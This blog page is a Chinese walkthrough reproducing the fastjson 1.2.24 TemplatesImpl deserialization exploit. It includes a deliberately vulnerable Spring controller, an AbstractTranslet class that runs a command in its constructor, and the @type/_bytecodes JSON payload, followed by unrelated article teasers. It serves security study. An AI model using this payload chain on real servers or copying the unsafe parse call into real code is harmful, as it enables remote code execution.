当前位置：首页 > news >正文

fastjson利用templatesImpl链

news 2026/1/31 10:12:08

fastjson1.2.24
环境：
pom.xml：

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.6.11</version><relativePath/> <!-- lookup parent from repository --></parent><groupId>com.example</groupId><artifactId>Fastjson-test</artifactId><version>0.0.1-SNAPSHOT</version><name>Fastjson-test</name><description>Fastjson-test</description><properties><java.version>1.8</java.version></properties><dependencies><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId></dependency><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-test</artifactId><scope>test</scope></dependency><dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.24</version></dependency></dependencies><build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-compiler-plugin</artifactId><version>3.8.1</version><configuration><source>1.8</source><target>1.8</target><encoding>UTF-8</encoding></configuration></plugin><plugin><groupId>org.springframework.boot</groupId><artifactId>spring-boot-maven-plugin</artifactId></plugin></plugins></build></project>

FastjsonController.java：

package com.example.fastjsontest;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;@Controller
public class FastjsonController {@PostMapping( "/deserialize")@ResponseBodypublic String deserialize(@RequestParam String code) throws Exception{
//        JSON.parse(code);//fastjson1.2.47 TemplatesImpl利用JSON.parseObject(code,Object.class, Feature.SupportNonPublicField);return "deserialize";}
}

恶意类代码：
TemplatesImplEvil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class TemplatesImplEvil extends AbstractTranslet {public TemplatesImplEvil() throws IOException {super();Runtime.getRuntime().exec("calc");}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

build成TemplatesImplEvil.class
然后base64编码该类
在这里插入图片描述
然后burp输入

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAA......."],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

在这里插入图片描述
可以看的到成功弹出计算器

fastjson利用templatesImpl链

fastjson1.2.24 环境： pom.xml： <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLoc…...

编程日记 2023/8/29 7:24:24

OpenCV 开启O3优化

opencv默认没有开启O3优化选项，需要进行手动设置，下面是一种优化方法： 方法一在 /opencv-4.5.5/cmake/OpenCVCompilerOptions.cmake 中的第 269 行做出以下修改： # 修改前 set(OPENCV_EXTRA_FLAGS_RELEASE "${OPENCV_EXT…...

编程日记 2023/8/29 7:23:22

2023.8.27今天我学习了如何使用css制作一个四角边框，效果如下： .style{background: linear-gradient(#33cdfa, #33cdfa) left top,linear-gradient(#33cdfa, #33cdfa) left top,linear-gradient(#33cdfa, #33cdfa) right top,linear-gradient(#33cdfa, #…...

编程日记 2023/8/29 7:22:20

摆动序列【贪心算法】

摆动序列如果连续数字之间的差严格地在正数和负数之间交替，则数字序列称为摆动序列。第一个差（如果存在的话）可能是正数或负数。仅有一个元素或者含两个不等元素的序列也视作摆动序列。 class Solution {public int wiggleMaxLength(int…...

编程日记 2023/8/29 7:21:19

【Terraform学习】使用 Terraform创建 S3 存储桶事件（Terraform-AWS最佳实战学习）

本站以分享各种运维经验和运维所需要的技能为主《python》：python零基础入门学习《shell》：shell学习《terraform》持续更新中：terraform_Aws学习零基础入门到最佳实战《k8》暂未更新《docker学习》暂未更新《ceph学习》ceph日常问题解…...

编程日记 2023/8/29 7:20:17

自定义String字符串工具类 StringUtils.java

自定义String字符串工具类 StringUtils.java 简介自定义String字符串工具类 api 是否为空 checkEmpty(String str);目标字符串是目标数组中的一个 checkContains(String str, String[] target);限制最大长度 checkMaxLength(String str, Long l);是否纯数字的字符串 check…...

编程日记 2023/8/29 7:19:16

mongTemplate实现group分组查询aggregation

MongoService封装 <T> List<T> group(Class<T> clazz, Aggregation aggregation,String documentName); MongoServiceImpl实现类 Overridepublic <T> List<T> group(Class<T> clazz, Aggregation aggregation,String documentName) {//…...

编程日记 2023/8/29 7:18:15

防御网络攻击风险的4个步骤

如今，人们正在做大量工作来保护 IT 系统免受网络犯罪的侵害。令人担忧的是，对于运营技术系统来说，情况却并非如此，运营技术系统用于运行从工厂到石油管道再到发电厂的所有业务。组织应该强化其网络安全策略，因为针对…...

编程日记 2023/8/29 7:17:14

相机SD卡数据丢失如何恢复？

出门在外，相机是人们记录生活点滴的重要工具，是旅游的最佳玩伴。人们每到一个地方，都喜欢用相机来见证自己来过的痕迹，拍好的照片都会被放到相机卡里，但在使用相机时，有时我们会意外删除了重要的照片或视频…...

编程日记 2023/8/29 7:16:13

Java小记-矩阵转置

对于给定的一个二维矩阵，请转置后进行输出。输入描述对于一个n*m的矩阵，输入有n行，每行是m个以空格分隔的数字。输出描述 n*m矩阵的转置矩阵。输出m行，每行是n个空格分隔的数据。 import java.io.*; import java.util.*;pub…...

编程日记 2023/8/29 7:15:12

计网-控制平面

下个月前最后一篇计网笔记，再坚挺一下，网络如同海洋，任我穿梭遨游~~ ——题记大多数的算法更新，就是枚举路由器与交换机的区别文章目录概述小白Dilistra:w的邻域按权值排序，v[w,i]min(c[w,i],v[w,i-1]c[i-1,i],...…...

编程日记 2023/8/29 7:14:11

Markdown 扩展语法练习

风无痕 August 26, 2023 Markdown 指南中文版 Markdown 入门指南Markdown 基本语法Markdown 扩展语法Markdown 基本语法练习Markdown 扩展语法练习代码 <h3 id"table">表格</h3>| Syntax | Description | | --- | --- | | Header | Title | | Paragrap…...

编程日记 2023/8/29 7:13:09

ubuntu上安装boost库为SOMEIP的X86和ARM下编译做准备（编译两种版本）

1 X86架构Linux（ubuntu）操作系统上Boost库的编译安装1.1 Boost源码下载1.2 编译选项配置1.3 编译 Boost 库1.4安装 Boost 库2 Boost库的ARM架构编译1 X86架构Linux（ubuntu）操作系统上Boost库的编译安装 Boost库是C++拓展库，是SOMEIP源码编译所必需的库。编译 Boost 库时，…...

编程日记 2023/8/29 7:12:09

[NSSCTF 2nd] NSS两周年纪念赛。

都说开卷有益，其实作题也有益，每打一次总能学到点东西。 PWN NewBottleOldWine 这个没作出来，一时还不明白RISC-V64怎么弄本地环境，不过看了WP感觉很简单，取flag用不着环境。 IDA不给翻译了，一点点看汇…...

编程日记 2023/8/29 7:11:07

【星戈瑞】FITC-PEG-N3在细胞示踪中的应用

欢迎来到星戈瑞荧光stargraydye！小编带您盘点： FITC-PEG-N3在细胞示踪中具有多样性应用。细胞示踪是指使用荧光标记物追踪和观察细胞在体内或体外的位置、迁移、增殖等行为。以下是FITC-PEG-N3在细胞示踪中的主要应用方面： 1. 细胞迁移研究…...

编程日记 2023/8/29 7:10:05

【Linux】【驱动】自动创建设备节点

【Linux】【驱动】自动创建设备节点续驱动代码操作指令linux端从机端续这里展示了如何自动的方式去创建一个字符类的节点下面就是需要调用到的程序函数 void cdev_init(struct cdev *, const struct file_operations *);第一个参数要初始化的 cdev 第二个参数文件操作…...

编程日记 2023/8/29 7:09:04

自实现getprocaddress（名称查找或者序号查找）

通过名称去找 // MyGETPRCOADDRESS.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 //#include <iostream> #include<Windows.h>/*WINBASEAPI //导出不需要使用，那么我们注释掉*/ FARPROC WINAPI MyGetProcAddress(_In_ HMO…...

编程日记 2023/8/29 7:08:03

如何DIY制作干洗店洗护小程序

洗护行业正逐渐迎来线上化的浪潮，传统的干洗店也开始尝试将业务线上化，以提供更便捷的服务给消费者。而制作一款洗护小程序，成为了干洗店实现线上化的重要一环。今天，我们就来分享一下如何使用第三方制作平台制作洗护小程序的教程…...

编程日记 2023/8/29 7:07:01

微前沿 | 第1期：强可控视频生成；定制化样本检索器；用脑电重建视觉感知；大模型鲁棒性评测

欢迎阅读我们的新栏目——“微前沿”！ “微前沿”汇聚了微软亚洲研究院最新的创新成果与科研动态。在这里，你可以快速浏览研究院的亮点资讯，保持对前沿领域的敏锐嗅觉，同时也能找到先进实用的开源工具。本期内容速览 01. 强可…...

编程日记 2023/8/29 7:06:00

SQLite数据库C_C++接口（保姆级API应用 1.4W字）（全网最详细介绍，学完必掌握）

目录 sqlite3的C/C API应用前言 SQLite3库安装 API函数打开、关闭、错误处理打开返回值关闭错误调试实际应用执行SQL（DDL、DML） API介绍实际应用回调函数查询 API介绍实际应用全缓冲查询 API介绍实际应用字节缓冲查询…...

编程日记 2023/8/29 7:04:58

19c补丁后oracle属主变化，导致不能识别磁盘组

补丁后服务器重启，数据库再次无法启动 ORA01017: invalid username/password; logon denied Oracle 19c 在打上 19.23 或以上补丁版本后，存在与用户组权限相关的问题。具体表现为，Oracle 实例的运行用户（oracle）和集…...

编程新知 2026/1/27 10:50:07

conda相比python好处

Conda 作为 Python 的环境和包管理工具，相比原生 Python 生态（如 pip 虚拟环境）有许多独特优势，尤其在多项目管理、依赖处理和跨平台兼容性等方面表现更优。以下是 Conda 的核心好处： 一、一站式环境管理&#xff1a…...

编程新知 2025/11/29 6:54:19

AI Agent与Agentic AI：原理、应用、挑战与未来展望

文章目录一、引言二、AI Agent与Agentic AI的兴起2.1 技术契机与生态成熟2.2 Agent的定义与特征2.3 Agent的发展历程三、AI Agent的核心技术栈解密3.1 感知模块代码示例：使用Python和OpenCV进行图像识别 3.2 认知与决策模块代码示例：使用OpenAI GPT-3进…...

编程新知 2026/1/23 7:04:53